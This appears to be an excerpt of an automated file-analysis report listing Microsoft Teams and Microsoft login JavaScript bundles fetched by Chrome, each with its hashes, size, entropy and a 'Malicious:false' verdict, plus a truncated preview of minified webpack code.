                                                                                                                                                                                                                                                                            SHA-512:259D7C4A462AA51812A70416226BBBF80DB02532E46CC4F108BA19761BC4C5BD01102E9E27DDFBE64C428A1BEC581B659B553998B02FD54A3FE3585E0B4988E5
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/msal-service-21cb4a42aeda436f.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[148298],{845484:(e,t,r)=>{r.r(t),r.d(t,{Msal2AuthenticationProvider:()=>k,convertTokenResourceToMsalCompatible:()=>C});var i=r(364819),o=r(280454),n=r(495668),s=r(608911),a=r(981462),c=r(847431),l=r(923226),u=r(848020),d=r(366603),h=r(935008),_=r(510139),g=r(703478),p=r(417694),A=r(469974),m=r(211713),f=r(72909),I=r(78219),S=r(565439),b=r(406138),v=r(775251);const T=["service::api.fl.spaces.skype.com::MBI_SSL"],{PopUpWindowError:R}=c.tG;class k{constructor(e,t,r,n,f){this._config=e,this._currentUrl=t,this._windowProvider=r,this._crossTabCallbacks=n,this._coreSettings=f,this._authority="",this._waitingForHandleRedirectToCompletePromise=void 0,this.login=async e=>{const{correlation:t,silent:r,extraQueryParameters:i}=e,o=e.loginHint||this._config.loginHintFromCore;await this._waitingForHandleRedirectToCompletePromise;const n=!!i?.tenant_login_for_mfa,s=!!i?.isTenantQsp,a=i?.tena
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (46888)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):46996
                                                                                                                                                                                                                                                                            Entropy (8bit):5.108957386891247
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:ah4GRVGB3+pCxxesNuoDEcv9FLuCn+MAr7F4wZZMxhD:wSe6fDEoLuVMArLZZMxx
                                                                                                                                                                                                                                                                            MD5:B318139959F84BFCD9194D8BBA1F1797
                                                                                                                                                                                                                                                                            SHA1:48A05E8B5EBDB233C28F154AAFB164903ACEBF21
                                                                                                                                                                                                                                                                            SHA-256:9782CDAE931F663CDFC8BBCDE6A7C99B872B6382661863D7E96C76F075469063
                                                                                                                                                                                                                                                                            SHA-512:B340FA47578450E78009080790C0412251A9171E532ABBC9EF7ED65AAA200968E3A7B68242F85A401657E28BBDBD9A979E2544755BC752ED431BD937D3CA6FE1
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/183153-1c9db25c40ee158a.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[183153],{878709:(e,t,n)=>{e.exports=n(765583)},140906:(e,t,n)=>{var o=e.exports=n(490627),r=/\s+/,i={};o.Callbacks=function(e){e="string"==typeof e?i[e]||function(e){var t=i[e]={};return o.each(e.split(r),(function(e,n){t[n]=!0})),t}(e):o.extend({},e);var t,n,a,c,s,l,u=[],d=!e.once&&[],p=function(o){for(t=e.memory&&o,n=!0,l=c||0,c=0,s=u.length,a=!0;u&&l<s;l++)if(!1===u[l].apply(o[0],o[1])&&e.stopOnFalse){t=!1;break}a=!1,u&&(d?d.length&&p(d.shift()):t?u=[]:g.disable())},g={add:function(){if(u){var n=u.length;!function t(n){o.each(n,(function(n,r){var i=o.type(r);"function"===i?e.unique&&g.has(r)||u.push(r):r&&r.length&&"string"!==i&&t(r)}))}(arguments),a?s=u.length:t&&(c=n,p(t))}return this},remove:function(){return u&&o.each(arguments,(function(e,t){for(var n;(n=o.inArray(t,u,n))>-1;)u.splice(n,1),a&&(n<=s&&s--,n<=l&&l--)})),this},has:function(e){return o.inArray(e,u)>-1},empty:function()
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (25864)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):25972
                                                                                                                                                                                                                                                                            Entropy (8bit):5.48597695089985
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:oVFeWjXDaRkYW2RdOh8AoxPBO/68cxi2pcaiGn/scPHiH2sNSE5dMj33/:IU10SP5l
                                                                                                                                                                                                                                                                            MD5:4688B4329ED2F5D20A7D44572488B666
                                                                                                                                                                                                                                                                            SHA1:8697904E227289A61B005D47BEA82645089DCA1C
                                                                                                                                                                                                                                                                            SHA-256:BB652F709A874011FF22BEE5719E2C163F326E20B797E75BCE173E2D66BD0287
                                                                                                                                                                                                                                                                            SHA-512:52036535EAE64B24F710681DBF6D4C0A4AAF28B116BD7FBBFC942045F653119169EBC694F4C2601690FB81CDFF8D83A6E21FC9164C815A36F3B67BE3FCE5E3F3
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[334217],{122487:(e,t,n)=>{n.d(t,{GW:()=>w,LY:()=>S,Fo:()=>j,Gx:()=>T,wU:()=>k});var o=n(332752),i=n(881360),a=n(727572),r=n(127066),s=n(757060),c=n(483330),d=n(751067),l=n(37868),m=n(771477),u=n(825268),g=n(969414),f=n(362328);const p={kind:"Document",get definitions(){const e=(0,f.G)("fragment ComponentsSkypeEmoticonCustomEmojiCategoryFragment on EmojiCategory {id,title,count}");return delete this.definitions,this.definitions=e.definitions}},h={kind:"Document",get definitions(){const e=(0,f.G)("query ComponentsSkypeEmoticonCustomEmojiCategoryQuery($includeCategories:Boolean) {emojiSearch(includeCategories:$includeCategories) {... on EmojiCategoryConnection {edges {node {...ComponentsSkypeEmoticonCustomEmojiCategoryFragment}}}}}");return delete this.definitions,this.definitions=[...e.definitions,...p.definitions]}};var b=n(8607),C=n(236347),y=n(956400),v=n(573990),E=n(487132)
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (33656)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):33764
                                                                                                                                                                                                                                                                            Entropy (8bit):5.60156438987075
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:uaEXiN3NpnQ2o+H7RyZTG76kQ3vIJ7lulJbjlNUXM0PSro5h/mF0nDS9w7fv/hxj:uKN3NpnQ2oY8pG7G3vabDJj0zytd
                                                                                                                                                                                                                                                                            MD5:D010EF6AEC4927AB3BB5049C00D70842
                                                                                                                                                                                                                                                                            SHA1:9D23110792583AAF46063E62006CFF812A81549A
                                                                                                                                                                                                                                                                            SHA-256:9FF10088E9376E32B8657F7B51092829F068D89B65B8AF472AF59C87A82DD68A
                                                                                                                                                                                                                                                                            SHA-512:243BE3C3E79BE17165A2B7561E8534997DD57B9B04E314544965378CA1BC4E01F0BDFA8A5AD63C3F67D7F2DD724F775ABDD55B0D9F082FDFD5969C5514854081
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[900516],{111631:(e,t,r)=>{function i(e,t){var r=t&&t.cache?t.cache:l,i=t&&t.serializer?t.serializer:u;return(t&&t.strategy?t.strategy:a)(e,{cache:r,serializer:i})}function n(e,t,r,i){var n,s=null==(n=i)||"number"==typeof n||"boolean"==typeof n?i:r(i),o=t.get(s);return void 0===o&&(o=e.call(this,i),t.set(s,o)),o}function s(e,t,r){var i=Array.prototype.slice.call(arguments,3),n=r(i),s=t.get(n);return void 0===s&&(s=e.apply(this,i),t.set(n,s)),s}function o(e,t,r,i,n){return r.bind(t,e,i,n)}function a(e,t){return o(e,this,1===e.length?n:s,t.cache.create(),t.serializer)}r.d(t,{A:()=>i,W:()=>h});var u=function(){return JSON.stringify(arguments)};function c(){this.cache=Object.create(null)}c.prototype.get=function(e){return this.cache[e]},c.prototype.set=function(e,t){this.cache[e]=t};var l={create:function(){return new c}},h={variadic:function(e,t){return o(e,this,s,t.cache.create(
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (27739)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):27847
                                                                                                                                                                                                                                                                            Entropy (8bit):5.582655801046033
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:PVpVp1EWy8YJ74IXobfOBTdwTcbmtd2MysmVCmTd3U:PVpVXyV47OBTj2Lyrdk
                                                                                                                                                                                                                                                                            MD5:B86940E1249BB0C8AFE8DB03135E4D43
                                                                                                                                                                                                                                                                            SHA1:14F8EBD539B8BD151DA240F7890FDC36E0E2AB11
                                                                                                                                                                                                                                                                            SHA-256:04EFF2C0FF17604532B25CA5088568505B7F5FF5ED0B5B0CED70ECE7B3B146BE
                                                                                                                                                                                                                                                                            SHA-512:C1B3C15803C20A2DDCF973707FD25A738B368C09481EB729F50EAB72BB598FF558EF8047607D8923F2F9263CEE1BE0A08EEFC7312E4F2A697D890E03E9CFA06C
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/170464-a41687f997fee720.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[170464],{805809:(e,t,n)=>{"use strict";var i,a;n.d(t,{p:()=>i,f:()=>a}),function(e){e.ActiveDirectoryGroupService="ActiveDirectoryGroupService",e.AiInsightsFeedbackService="AiInsightsFeedbackService",e.AppService="appservice",e.AppStudio="appstudio",e.AMS="asyncMediaService",e.AtpSafelinksService="atpSafelinksService",e.Attendee="attendee",e.AllFiles="allFiles",e.Auth="auth",e.Badger="badger",e.BRB="brb",e.CDN="cdn",e.CallingConversationService="callingConversationService",e.ChannelNotificationSettings="channelNotificationSettings",e.CognitiveService="cognitiveService",e.ChatService="chatservice",e.CMDArtifactsService="cmdArtifactsService",e.CmdMeetingIntelligenceService="cmdMeetingIntelligenceService",e.CMDServices="cmdServices",e.CNS="cns",e.CollabCloudService="collabCloudService",e.CSA="csa",e.CustomEmoji="customEmoji",e.CXCS="cxcs",e.DynamicsMarketing="dynamicsMarketing",e.DynamicsVir
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (45797)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):406986
                                                                                                                                                                                                                                                                            Entropy (8bit):5.31836569617146
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:f5+ROkZBKxn7oW/sKni2JcPwRTQx4J77m7mBdhh2uZifxOjrCpaLmnF:uOkWxp/Fi9Nxe7maZc7F
                                                                                                                                                                                                                                                                            MD5:E40761677762EAB0692F86B259C7D744
                                                                                                                                                                                                                                                                            SHA1:34A9B50CEC6E1163CEEFCD4D394DB6524C89A854
                                                                                                                                                                                                                                                                            SHA-256:DA4A8DF0C326292B5BEE9C732B3C962FD67AAF2F99D850F1BF65068D573C5619
                                                                                                                                                                                                                                                                            SHA-512:04FA1D6074AD24E3ABAB53D1DE116A6B39B4BE3DFABC082427F1C5A169E50527561F160CC133C2AC4AEDC4E7AC404572F60E531A4618111EA74D138B2B0DD034
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://aadcdn.msftauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.js
                                                                                                                                                                                                                                                                            Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.(window.webpackJsonp=window.webpackJsonp||[]).push([[8],Array(533).concat([f
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (41208)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):41316
                                                                                                                                                                                                                                                                            Entropy (8bit):5.449314839790103
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:Q42uklpV7uhBJ7Xl65N6IGnmNhR7QuByQO8wjWjXVx3jT/jERaAw5aGH2/46u5Z3:Q+0WJTyWnCkQ7yaVh5LZ8WdgKmJw6IGu
                                                                                                                                                                                                                                                                            MD5:8379A737A4ED02AAB09280C8DE34F0EA
                                                                                                                                                                                                                                                                            SHA1:C4008374C17B522D0B4F488B5A0B5C000BE8EDF9
                                                                                                                                                                                                                                                                            SHA-256:934F305FF1F77A3D1DF9AF74F6BE4E2053B2BAA520C119CEEE066322788C3B6A
                                                                                                                                                                                                                                                                            SHA-512:A445199990CA5E470E9664D930E27950D8D1BE46AE8E491A4AC55E82F18B2E3638B472802F217969F00B9CB2FF3C99533921A5D97C288375AC1F16C8280126CF
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[613400],{466563:(e,t,a)=>{a.d(t,{Xp:()=>i,AX:()=>o,q0:()=>r,WD:()=>s});var n=a(942016);function i(e,t){return{entity:{type:n.ck.chats,action:n.SY.create,id:o(e)},command:t}}function o(e){return JSON.stringify(e&&e.length>0?e.sort():[])}function r(e,t,a,n){let i={};if(!e)return i;if(e.type===t&&e.action===a){const t=e.options;if(t&&"string"==typeof t)try{i=JSON.parse(t)}catch{n.warn(`Entity options are in unexpected format. Expected a valid stringified JSON object but instead received: ${String(t)}.`)}}else n.warn(`Entity options are (incorrectly) being asked for type and action that do not pertain to the entity. ${String(e.type)} != ${String(t)} or ${String(e.action)} != ${String(a)}`);return i}const s=e=>`${e.substring(0,32)}00000000${e.substring(40)}`},403376:(e,t,a)=>{a.d(t,{r:()=>i});var n=a(362328);const i={kind:"Document",get definitions(){const e=(0,n.G)("query message
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):111660
                                                                                                                                                                                                                                                                            Entropy (8bit):4.389242119594684
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:ZevuH9Xq2DtYoZIVbgG0mcJpHo9HqXSWcYfAZe8Hc2bLn4+JNeaJ7uXD/:BhZIVbgG05D3DO0S4
                                                                                                                                                                                                                                                                            MD5:509FABFDC5746F4327E1120C07006B11
                                                                                                                                                                                                                                                                            SHA1:FB0755BC615C83D3544F5DC61262A5A9B09C6F98
                                                                                                                                                                                                                                                                            SHA-256:D4303779255C3F002668E0FE5F755F5807C246EA8D8FC1D453EA92CF8F98184B
                                                                                                                                                                                                                                                                            SHA-512:DBE42F517AB3C4CE9FC6CF847B9FC87DC49FB51E3330F689B183EE58F9C1E46EBFB2B6373C77FA901EFA1F4AE9DB06AB444D7A5F90CBEEEB67993B2153495839
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[378200],{378200:(a,l,Z)=>{Z.d(l,{bBY:()=>h,lt0:()=>c,yOJ:()=>m,gT3:()=>v,BqX:()=>M,B$Y:()=>H,xBE:()=>A,n7r:()=>r,fZ1:()=>V,dDX:()=>i,FEK:()=>U,$Ke:()=>d,nX0:()=>u,BJl:()=>n,wlb:()=>L,qEH:()=>R,xU9:()=>t,NfP:()=>o,u50:()=>S,wIv:()=>g,mFV:()=>F,eFJ:()=>s,TXX:()=>P,bkw:()=>C,mKe:()=>p,qW2:()=>f,eH5:()=>k,ad_:()=>b,fQJ:()=>y,D$b:()=>O,ifC:()=>T,mtw:()=>w,WGt:()=>B,y2l:()=>x,zPH:()=>q,d5R:()=>I,xPN:()=>D,dGC:()=>E,QOI:()=>N,iN6:()=>J,opr:()=>Q,aUx:()=>X,HC5:()=>K,vpp:()=>_,maG:()=>j,MJQ:()=>W,BHV:()=>G,VC0:()=>Y,CQz:()=>$,uqx:()=>z,sPT:()=>aa,OYi:()=>la,Q7X:()=>Za,cX9:()=>ea,tvn:()=>ha,VeZ:()=>ca,OoO:()=>ma,eEF:()=>va,FfV:()=>Ma,bBX:()=>Ha,I7h:()=>Aa,WiT:()=>ra,jU7:()=>Va,jNX:()=>ia,Luu:()=>Ua,Zi6:()=>da,g6R:()=>ua,cKq:()=>na,b$F:()=>La,OfM:()=>Ra,zw9:()=>ta,nbT:()=>oa,oV5:()=>Sa,K4g:()=>ga,UEw:()=>Fa,E68:()=>sa,pXb:()=>Pa,tmX:()=>Ca,VIN:()=>pa,tBY:()=>fa,ktJ:()=>ka,sH_:()=>ba,V3L
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):343054
                                                                                                                                                                                                                                                                            Entropy (8bit):5.576072709720014
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:6144:DqxiCcDud8nGFwieNrhuSX7LmYHb1Evk5w79mqmum5d41AE:FCcDu0GubtuSX7L378
                                                                                                                                                                                                                                                                            MD5:B9727149EC34D6036CA4E79D465C92E1
                                                                                                                                                                                                                                                                            SHA1:253CB50BA90E483A86A31D28EED829EEB8BF8E66
                                                                                                                                                                                                                                                                            SHA-256:2EB85482C1EB8CDF46FFEBCB20E72D04D7ABB6920A74D191ED97C5F9D837A089
                                                                                                                                                                                                                                                                            SHA-512:FB16255CC17EAFFB58A037CD969D46E7F72EA79D2CFDE81E199D5AED8EF9EC3A77D9E54DDBBD09615804476972AEC62A737E3903A7DB11F5DB4163D8EB9E54DB
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[407772],{73654:(e,t,n)=>{"use strict";n.d(t,{o:()=>s});var o=n(513432);const{useEffect:r,useRef:i,useState:a}=o;function s(e){const t=i(!1),n=i(new Image),[o,s]=a(!1);return e&&n.current.src!==e&&(n.current.src=e),n.current.onerror=()=>{t.current&&s(!0)},r((()=>(t.current||(t.current=!0),()=>{t.current=!1})),[]),o}},808761:(e,t,n)=>{"use strict";n.d(t,{O:()=>s});var o=n(193021),r=n(707754),i=n(332752),a=n(440320);function s(e,t,{coreShortcutService:n,shortcutExecutionService:s,enableShortcutPropagation:c,isBridge:l,windowProvider:d,windowId:u,clientPreferences:p}={},g,h){const m=d||(0,o.z)(),S=/Mac|iPod|iPhone|iPad/.test(navigator.platform),{applyDesktopKeymappingStrategy:C,applySurfaceHubKeymappingStrategy:y,enableDevShortcuts:f,enableShortcutRegistrationWithDesktopClient:A,enableGlobalShortcuts:I,globalShortcuts:b,useF6LandmarkDesktop:v,revertMacOptShortcuts:w}=t.get(i.w.Shortcuts,["app
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (16821)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):16967
                                                                                                                                                                                                                                                                            Entropy (8bit):4.681851562181058
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:nbZwQXd5Bb3yaqArKvqY7hH0jO6Rt6plXnF9:nDXd5Bb3yaqArQ/7OTWh
                                                                                                                                                                                                                                                                            MD5:FC8EAA63A015BE67159AFD0CB0234119
                                                                                                                                                                                                                                                                            SHA1:901AE17C3F155C4C05DD1E7D40A329AD4CE43EA9
                                                                                                                                                                                                                                                                            SHA-256:CCAF6E623667D96CD9AED78F610A9B9694A490095A1154E13BF6E2BF0C1C1499
                                                                                                                                                                                                                                                                            SHA-512:578AFB231C0063F173C8641DE7A5285C2D762E5366C241A6062BAF16F8F37692A1017C1BB36FCE1FFD80526A8D81C5A415B1F4F8EB21FD3E2A36E3752B1C8B0E
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/meeting-collaboration-locale-en-us-c632953fc9841db0.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[62600],{629050:(e,t,o)=>{o.r(t),o.d(t,{default:()=>i});const i={namespace:"meetingCollaboration",locale:"en-us",translations:{ai_disclosure_text:"AI-generated content may be incorrect",ai_generated_text_in_copy_to_clipboard:"AI-generated content. Be sure to check for accuracy.",app_signin_text:"For me to reference {{appName}}, you'll need to sign in. Once you do, resubmit your request.",breakout_rooms_commanding_not_supported_one_to_one_call:"Breakout rooms are not supported for One to One call",breakout_rooms_commanding_not_supported_recap:"Breakout rooms are not supported in recap copilot",calling_open_text_watermark:"Ask me anything about this call",chat_copilot_commanding_error:"Sorry, something went wrong.",chat_copilot_info_description_1:"Copilot can summarize the conversation and key takeaways.",chat_copilot_info_header_1:"Chat highlights",chat_highlights_from_the_past
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):68001
                                                                                                                                                                                                                                                                            Entropy (8bit):5.4641406890766735
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:htqnERGFVFUX2aWZ28xw29/Qs0FPsigdWusCNMvOZvZ/C7rMnNRjP3:6m2aCg7rM3
                                                                                                                                                                                                                                                                            MD5:501B9A40586E690F4951D011050FB92E
                                                                                                                                                                                                                                                                            SHA1:2CA6C52FCE474D00DD7A4BD8A01180832DA90A64
                                                                                                                                                                                                                                                                            SHA-256:49466B5940D9ABCE66BCA1228FF4583B38EF4E2A03F306026058354C32012876
                                                                                                                                                                                                                                                                            SHA-512:CFF558C7CA7308AEB8C3831996672C17D639841781762DD1A71928294BAEB488F2DBBE67062BA7760D87E14CF703A814593FE41E612036681110F44776A0187B
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[441408],{526468:(e,n,t)=>{var i;t.d(n,{Jy:()=>i,IQ:()=>a,Wm:()=>r,Oi:()=>s}),function(e){e.Minimal="Minimal",e.Chat="Chat",e.CommentStream="CommentStream",e.MeetingDetails="MeetingDetails",e.ShareToTeams="ShareToTeams",e.VirtualEvents="VirtualEvents",e.StatusNote="StatusNote"}(i||(i={}));const a={mention:["aria-label","mri","type","itemscope"],link:["href","data-itemprops","itemtype","rel","title","target","itemid","data-processed-url"]},r={link:["href","rel","title","target"]},s={emoticon:"http://schema.skype.com/Emoji",mention:"http://schema.skype.com/Mention",topic:"http://schema.skype.com/Topic",giphy:"http://schema.skype.com/Giphy",sticker:"http://schema.skype.com/Sticker",cachedImage:"http://schema.skype.com/CachedImage",amsImage:"http://schema.skype.com/AMSImage"}},651482:(e,n,t)=>{t.d(n,{O:()=>i,uS:()=>a,pP:()=>r,V7:()=>s,kF:()=>o});const i={inviteOffNetworkContacts:"
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):97850
                                                                                                                                                                                                                                                                            Entropy (8bit):5.493892052799283
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:23FpjFZJC0EncEOUi21jdNpor/ArvEPfKlK56kptA:2VhJC0EncE22HQpPfKlK5zA
                                                                                                                                                                                                                                                                            MD5:566DA242F6686B87C944560F980680AC
                                                                                                                                                                                                                                                                            SHA1:E6B12B496B7059868098714C644EF12156D90FAF
                                                                                                                                                                                                                                                                            SHA-256:08A384EF2B326C6885BD1D0DCD1086EE911B965AD8DA1FB3E62AB5EEDBD3C155
                                                                                                                                                                                                                                                                            SHA-512:62B9A176AE6B9ED612AAA28D674C6D21D7C7BE7C5A00E403526A6CBB2C7B0FA5EC9422AA5AB28208C7D23B3A9769AEA53C8D5AFA9C241E54A26B40E996B5AF15
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/500479-7d013a411c09d21b.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[500479],{156054:(e,t,n)=>{n.d(t,{j:()=>b});var r=n(340415),i=n(344411),a=n(680828),o=n(779497),s=n(179233),u=n(661187),l=n(679080),c=n(943085),f=["ACCDA","ACCDB","ACCDC","ACCDE","ACCDR","ACCDT","ACCDU","ACCDW","ACCFT","ADE","ADN","ADP","AVI","BMP","CSV","DOC","DOCX","DOT","DOTX","ERR","FON","GIF","HTML","ISO","JPEG","JPG","LACCDB","LDB","LOG","MAD","MAF","MAG","MAM","MAQ","MAR","MAS","MAT","MAU","MAV","MAW","MDA","MDBHTML","MDE","MDN","MDT","MDW","MOV","MP3","MPD","MPG","MPP","MPT","MPW","MPX","MSG","OLS","ONE","ONEPKG","ONETOC","ONETOC2","OST","PDF","PNG","POT","POTHTML","POTX","PPA","PPS","PPSX","PPT","PPTHTML","PPTMHTML","PPTX","PPTXML","PST","PUB","PWZ","RTF","SLDM","SLDX","SLK","THMX","TIF","TIFF","TSX","TTF","TXT","VDW","VDX","VHD","VSD","VSDM","VSDX","VSIX","VSL","VSS","VSSM","VSSX","VST","VSTM","VSTX","VSU","VSW","VSX","WAV","WIZHTML","WMA","WMV","WPL","XLS","XLSHTML"
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):79350
                                                                                                                                                                                                                                                                            Entropy (8bit):4.361667020708487
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:JyFDl5rfjPfLO9InrulCCVfCLHaS29dbb3NbyH4IxnV94Jy:JurfnTCVfmHaS29dbb3dyH4I6y
                                                                                                                                                                                                                                                                            MD5:B4D415B263C182DB54F9262709BE4FD7
                                                                                                                                                                                                                                                                            SHA1:6C659EC1CD040E16F6CFFB51BEC5EADD2599C6D1
                                                                                                                                                                                                                                                                            SHA-256:50F0B4ADA66B0150FDD49F92EC770B29AD1D73A2CA0C62E0BD982C63F2CD447B
                                                                                                                                                                                                                                                                            SHA-512:E0662D53C739252E0F4CF5743B610AE9AEB80CC69F6800F95B99426431C4932EDA8C6E0DD135DEB8C26F5F1B8E15005813AB0EBFE8EC96CE0368BDC1F9502BCF
                                                                                                                                                                                                                                                                            Malicious:false
